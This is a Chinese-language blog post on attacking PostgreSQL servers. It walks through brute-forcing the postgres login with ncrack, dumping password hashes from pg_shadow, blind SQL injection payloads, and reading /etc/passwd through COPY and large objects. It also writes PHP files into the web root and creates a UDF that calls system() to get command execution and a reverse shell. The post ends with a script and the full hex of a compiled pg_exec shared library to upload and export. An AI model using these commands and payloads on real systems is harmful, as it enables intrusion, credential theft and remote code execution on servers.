postgresql渗透测试

youncyb 发布于 2019-03-08 4764 次阅读 SQL INJECTION


0.环境安装

1.apt install postgresql 默认将客户端和数据库都装上
2.默认监听127.0.0.1,修改监听

//1.修改/etc/postgresql/版本/main/postgresql.conf
# - Connection Settings -

listen_addresses = '*'                  # what IP address(es) to listen on;
                                        # comma-separated list of addresses;
                                        # defaults to 'localhost'; use '*' for all
                                        # (change requires restart)
port = 5432                             # (change requires restart)

//2.修改可连接ip /etc/postgresql/版本/main/pg_hba.conf
# "local" is for Unix domain socket connections only
local   all             all                                     peer
# IPv4 local connections:
host    all             all             192.168.239.1/24            md5
# IPv6 local connections:
host    all             all             ::1/128                 md5

3.修改postgres密码 alter user postgres with password 'password' 或者 \password postgres

1.常用控制台命令

\l          //列出所有数据库
\c 数据库名 //切换到
\d        //列出当前数据库所有表
\d 表名   //列出表的结构
\du      //列出所有用户及其权限结构
\conninfo //列出当前连接信息

2.ncrack爆破公网上的postgresql

root@we:~/reverse# ncrack -f --user postgres -P /usr/share/wordlists/rockyou.txt psql://192.168.239.157

Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-08 10:44 CST

Discovered credentials for psql on 192.168.239.157 5432/tcp:
192.168.239.157 5432/tcp psql: 'postgres' 'postgres'

Ncrack done: 1 service scanned in 3.95 seconds.

Ncrack finished.

3.获取标志信息

推测数据库类型 
################################################################
select version(); // 数据库版本和os版本信息
select '1'||'2';   // || 字符串拼接符类似于concat
select extract(year from now()); //只有在postgresql下不会报错

查看用户,以下四个输出一般情况下一致
################################################################
select user;
select current_user; //和第一个没什么区别,除非set role
select session_user; //当前数据库连接用户
select getpgusername(); //当前线程用户

4.常用函数

ascii()ord()encode(str,type)decode(str,type) //这里的decode函数有个大坑,tmd,还得用convert_from() 转一次
substr()substring(语句,1,1)
pg_sleep(5); //休眠5

只支持 limit x offset x 不支持 limit 0,1

pg_ls_dir('./')  //只能列当前目录及其子目录下的内容,绝对路径不支持
pg_read_file('./xxx') //同上
pg_file_write() // 同上

NULLIF(value1,value2) //可用来进行bool盲注,如果value1value2相同,则返回NULL,否则返回value1
copy //常用来写文件和读文件,借此可getshell

lo_create(12345) //创建大对象
lo_import('/etc/passwd',12345) //导入大对象,可用来读文件
lo_explort(12345,'/tmp/info') //导出大对象,可用来写文件
lo_unlink(12345) //删除大对象

5.枚举数据库

读取用户配置
################################################################
select username,passwd from pg_shadow;

获取所有数据库
################################################################
select datname from pg_database;
select current_database(); // 查看当前数据库

获取所有表
################################################################
select tablename from pg_tables;
select tablename from pg_tables where tablename not like 'pg_%' and tablename not like 'sql_%'; //过滤系统内置表
select table_name from information_schema.tables; //mysql相似,但模式(schema_name)里面是没有我们建立的表,只有public这种

获取所有列
################################################################
select column_name from information_schema.columns where table_name='xxxx'; //利用上一步得到的表名爆破列名

6.postgresql 盲注

  1. bool盲注
1.NULLIF() 方法
################################################################
test=# select name from user_test where 1=1 and 112=nullif(ascii(substr((select user),1,1)),0);
 name 
------
 yy
(1 row)

2.case when then else 方法
################################################################
test=# select name from user_test where 1=1 and (select case when(select current_database())='test' then true else false end);
 name 
------
 yy
(1 row)

test=# select name from user_test where 1=(select case when(select current_database())='test' then 1 else 0 end);
 name 
------
 yy
(1 row)

2.时间盲注
只有case when then else end 这种方法,具体参考上一点

7.读文件、写文件

1.读文件 copy大法
################################################################
test=# create table t_read(name text);
CREATE TABLE
test=# copy t_read from '/etc/passwd';
COPY 57
test=# select name from t_read;
test=# select name from t_read limit 1 offset 0;
              name               
---------------------------------
 root:x:0:0:root:/root:/bin/bash
(1 row)

2.读文件 lo_import大法
################################################################
select lo_import('/etc/passwd',1);
select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=1 order by pageno)a;

3.写文件 copy大法
################################################################
copy((select '<?php phpinfo();?>')) to '/var/www/html/a.php'

//php关键字
copy(select convert_from(decode('c2FkYWQ=','base64'),'UTF-8')) to '/tmp/pgpinfo.php';

4.写文件 lo_explort大法
################################################################
test=# select lo_create(1);
 lo_create 
-----------
         1
(1 row)

test=# insert into pg_largeobject values(1,0,'<?php 123');
INSERT 0 1
test=# select lo_export(1,'/tmp/phpinfo.txt');
 lo_export 
-----------
         1
(1 row)

8.命令执行(UDF)

1.低于8.2版本 (未尝试)

CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE C STRICT; 
select system('ls');

2.反弹shell的命令执行

create function exec(cstring) returns int as '/tmp/hack.so','pg_exec' language c strict
select exec('反弹命令');

https://github.com/Dionach/pgexec   //x.x.so文件 eg:9.6.so

3.在没有shell前提下如何上传.so文件?
可通过pg_largeobject将文件写入硬盘上,但每个文件大小应切分为2KB(pg_largeobject要求每一页不能超过2KB,不足2KB会用0填充)
cat udf.so | xxd -ps | tr -d "\n" > a.txt //将.so文件转换为16进制
借用一下别人的脚本:分为2KB


#~/usr/bin/env python 2.7
#-*- coding:utf-8 -*-
import sys
from random import randint
number = randint(1000, 9999)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage:python " + sys.argv[0] + "inputfile"
        sys.exit()
    fileobj = open(sys.argv[1],'rb')
    i = 0
    t = -1
    s = ''
    for b in fileobj.read():
        i = i + 1
        s += b
        if i % 4096 == 0:
            t = t + 1
            print 'insert into pg_largeobject values ({number}, {block}, decode(\'{payload}\',\'hex\'));\n'\
                    .format(number=number, block=t, payload=s)
            s = ''
    fileobj.close()

select lo_create(7653); //创建大对象


insert into pg_largeobject values (7653, 0, decode('7f454c4602010100000000000000000003003e0001000000d005000000000000400000000000000000190000000000000000000040003800070040001d001c0001000000050000000000000000000000000000000000000000000000000000003408000000000000340800000000000000002000000000000100000006000000000e000000000000000e200000000000000e2000000000002802000000000000300200000000000000002000000000000200000006000000180e000000000000180e200000000000180e200000000000c001000000000000c00100000000000008000000000000000400000004000000c801000000000000c801000000000000c80100000000000024000000000000002400000000000000040000000000000050e574640400000040070000000000004007000000000000400700000000000034000000000000003400000000000000040000000000000051e574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000052e5746404000000000e000000000000000e200000000000000e200000000000000200000000000000020000000000000100000000000000040000001400000003000000474e55000d94c0166f8b154dbc7341cf9d0b76fee4ea9be000000000030000000700000001000000060000008cc020010106c009070000000a0000000d0000004245d5ecbae3927c47da6a34a0106ea8d871581cb98df10ec60da6d4ebd3ef0e000000000000000000000000000000000000000000000000000000001c0000002000000000000000000000000000000000000000940000001200000000000000000000000000000000000000010000002000000000000000000000000000000000000000610000002000000000000000000000000000000000000000380000002000000000000000000000000000000000000000520000002200000000000000000000000000000000000000a50000001000170028102000000000000000000000000000b800000010001800301020000000000000000000000000008300000012000c00dd060000000000000d000000000000008c00000012000c00ea060000000000002a00000000000000ac00000010001800281020000000000000000000000000001000000012000900800500000000000000000000000000007500000012000c00d0060000000000000d000000000000001600000012000d0014070000000000000000000000000000005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c61737365730050675f6d616769635f66756e630070675f66696e666f5f70675f657865630073797374656d006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e350000000000000200000000000000020001000100010001000100010001000100010001009b0000001000000000000000751a690900000200bd00000000000000000e2000000000000800000000000000a006000000000000080e20000000000008000000000000006006000000000000201020000000000008000000000000002010200000000000d80f20000000000006000000010000000000000000000000e00f20000000000006000000030000000000000000000000e80f20000000000006000000040000000000000000000000f00f20000000000006000000050000000000000000000000f80f200000000000060000000600000000000000000000001810200000000000070000000200000000000000000000004883ec08488b05550a20004885c07402ffd04883c408c3000000000000000000ff35620a2000ff25640a20000f1f4000ff25620a20006800000000e9e0ffffffff25320a200066900000000000000000488d3d510a2000488d05510a2000554829f84889e54883f80e7615488b05e60920004885c074095dffe0660f1f4400005dc30f1f4000662e0f1f840000000000488d3d110a2000488d350a0a2000554829fe4889e548c1fe034889f048c1e83f4801c648d1fe7418488b05b10920004885c0740c5dffe0660f1f8400000000005dc30f1f4000662e0f1f840000000000803dc109200000752748833d8709200000554889e5740c488b3da2092000e83dffffffe848ffffff5dc6059809200001f3c30f1f4000662e0f1f840000000000488d3d6907200048833f00750be95effffff660f1f440000488b05290920004885c074e9554889e5ffd05de940ffffff554889e5488d05450000005dc3554889e5488d05540000005dc3554889e54883ec2048897de8488b45e8488b4020488945f8488b45f84889c7e8a2feffff489889c0c9c34883ec084883c408c30000001c0000008a030000640000002000000040000000010000000100000001000000011b033b340000000500000060feffff5000000080feffff7800000090ffffff900000009dffffffb0000000aaffffffd0000000000000001400000000000000017a5200017810011b0c070890010000240000001c00000008feffff20000000000e10460e184a0f0b770880003f1a3b2a33242200000000140000004400000000feffff0800000000000000000000001c0000005c000000f8feffff0d00000000410e108602430d06480c07080000001c0000007c000000e5feffff0d000000','hex'));

insert into pg_largeobject values (7653, 1, decode('00410e108602430d06480c07080000001c0000009c000000d2feffff2a00000000410e108602430d06650c0708000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0060000000000006006000000000000000000000000000001000000000000009b000000000000000c0000000000000080050000000000000d0000000000000014070000000000001900000000000000000e2000000000001b0000000000000008000000000000001a00000000000000080e2000000000001c000000000000000800000000000000f5feff6f00000000f0010000000000000500000000000000a003000000000000060000000000000038020000000000000a00000000000000c9000000000000000b000000000000001800000000000000030000000000000000102000000000000200000000000000180000000000000014000000000000000700000000000000170000000000000068050000000000000700000000000000a8040000000000000800000000000000c00000000000000009000000000000001800000000000000feffff6f000000008804000000000000ffffff6f000000000100000000000000f0ffff6f000000006a04000000000000f9ffff6f000000000300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000','hex'));

insert into pg_largeobject values (7653, 2, decode('180e20000000000000000000000000000000000000000000b60500000000000020102000000000004743433a202844656269616e20362e332e302d31382920362e332e302032303137303531360000000000000000000000000000000000000000000000000000000000000003000100c80100000000000000000000000000000000000003000200f00100000000000000000000000000000000000003000300380200000000000000000000000000000000000003000400a003000000000000000000000000000000000000030005006a0400000000000000000000000000000000000003000600880400000000000000000000000000000000000003000700a80400000000000000000000000000000000000003000800680500000000000000000000000000000000000003000900800500000000000000000000000000000000000003000a00a00500000000000000000000000000000000000003000b00c00500000000000000000000000000000000000003000c00d00500000000000000000000000000000000000003000d00140700000000000000000000000000000000000003000e00200700000000000000000000000000000000000003000f00400700000000000000000000000000000000000003001000780700000000000000000000000000000000000003001100000e20000000000000000000000000000000000003001200080e20000000000000000000000000000000000003001300100e20000000000000000000000000000000000003001400180e20000000000000000000000000000000000003001500d80f2000000000000000000000000000000000000300160000102000000000000000000000000000000000000300170020102000000000000000000000000000000000000300180028102000000000000000000000000000000000000300190000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000001001300100e20000000000000000000000000001900000002000c00d00500000000000000000000000000001b00000002000c00100600000000000000000000000000002e00000002000c00600600000000000000000000000000004400000001001800281020000000000001000000000000005300000001001200080e20000000000000000000000000007a00000002000c00a00600000000000000000000000000008600000001001100000e2000000000000000000000000000a50000000400f1ff00000000000000000000000000000000af00000001000e0020070000000000001c00000000000000c200000001000e003c070000000000000400000000000000010000000400f1ff00000000000000000000000000000000d00000000100100030080000000000000000000000000000de00000001001300100e2000000000000000000000000000000000000400f1ff00000000000000000000000000000000ea0000000100170020102000000000000000000000000000f700000001001400180e20000000000000000000000000000001000000000f00400700000000000000000000000000001301000001001700281020000000000000000000000000001f01000001001600001020000000000000000000000000003501000012000c00d0060000000000000d000000000000004301000020000000000000000000000000000000000000005f01000010001700281020000000000000000000000000006601000012000d00140700000000000000000000000000006c0100001200000000000000000000000000000000000000800100002000000000000000000000000000000000000000bd01000012000c00ea060000000000002a000000000000008f0100001000180030102000000000000000000000000000940100001000180028102000000000000000000000000000a00100002000000000000000000000000000000000000000b401000012000c00dd060000000000000d00000000000000c50100002000000000000000000000000000000000000000df0100002200000000000000000000000000000000000000fb01000012000900800500000000000000000000000000000063727473747566662e63005f5f4a43525f4c4953545f5f00646572656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e36393633005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e7472790070675f657865632e630050675f6d616769635f646174612e34363439006d795f66696e666f2e34363538005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f64736f5f68616e646c65005f44594e414d4943005f5f474e555f45485f4652414d455f484452005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f0050675f6d616769635f66756e63005f49544d5f64657265676973746572544d436c6f6e655461626c65005f6564617461005f66696e690073797374656d4040474c4942435f322e322e35005f5f676d6f6e5f73746172745f5f005f656e64005f5f6273735f7374617274005f4a765f5265676973746572436c61737365730070675f66696e666f5f70675f65786563005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e32','hex'));

insert into pg_largeobject values (7653, 3, decode('2e35005f696e697400002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e706c742e676f74002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e64796e616d6963002e676f742e706c74002e64617461002e627373002e636f6d6d656e740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b000000070000000200000000000000c801000000000000c80100000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000f001000000000000f0010000000000004400000000000000030000000000000008000000000000000000000000000000380000000b000000020000000000000038020000000000003802000000000000680100000000000004000000010000000800000000000000180000000000000040000000030000000200000000000000a003000000000000a003000000000000c90000000000000000000000000000000100000000000000000000000000000048000000ffffff6f02000000000000006a040000000000006a040000000000001e0000000000000003000000000000000200000000000000020000000000000055000000feffff6f020000000000000088040000000000008804000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000a804000000000000a804000000000000c0000000000000000300000000000000080000000000000018000000000000006e0000000400000042000000000000006805000000000000680500000000000018000000000000000300000016000000080000000000000018000000000000007800000001000000060000000000000080050000000000008005000000000000170000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000a005000000000000a00500000000000020000000000000000000000000000000100000000000000010000000000000007e000000010000000600000000000000c005000000000000c005000000000000080000000000000000000000000000000800000000000000000000000000000087000000010000000600000000000000d005000000000000d00500000000000044010000000000000000000000000000100000000000000000000000000000008d000000010000000600000000000000140700000000000014070000000000000900000000000000000000000000000004000000000000000000000000000000930000000100000002000000000000002007000000000000200700000000000020000000000000000000000000000000100000000000000000000000000000009b000000010000000200000000000000400700000000000040070000000000003400000000000000000000000000000004000000000000000000000000000000a900000001000000020000000000000078070000000000007807000000000000bc00000000000000000000000000000008000000000000000000000000000000b30000000e0000000300000000000000000e200000000000000e0000000000000800000000000000000000000000000008000000000000000800000000000000bf0000000f0000000300000000000000080e200000000000080e0000000000000800000000000000000000000000000008000000000000000800000000000000cb000000010000000300000000000000100e200000000000100e0000000000000800000000000000000000000000000008000000000000000000000000000000d0000000060000000300000000000000180e200000000000180e000000000000c00100000000000004000000000000000800000000000000100000000000000082000000010000000300000000000000d80f200000000000d80f0000000000002800000000000000000000000000000008000000000000000800000000000000d9000000010000000300000000000000001020000000000000100000000000002000000000000000000000000000000008000000000000000800000000000000e2000000010000000300000000000000201020000000000020100000000000000800000000000000000000000000000008000000000000000000000000000000e8000000080000000300000000000000281020000000000028100000000000000800000000000000000000000000000001000000000000000000000000000000ed0000000100000030000000000000000000000000000000281000000000000026000000000000000000000000000000010000000000000001000000000000000100000002000000000000000000000000000000000000005010000000000000b8050000000000001b0000002f0000000800000000000000180000000000000009000000030000000000000000000000000000000000000008160000000000000102000000000000000000000000000001000000000000000000000000000000','hex'));
select lo_export(7653,'/tmp/xxx.so');
然后就是上面的创建函数  执行命令

9.参考

http://www.jianfensec.com/postgresql_getshell.html
https://paper.tuisec.win/search.jsp?keywords=PostgreSql&&search_by_html=title&&page=1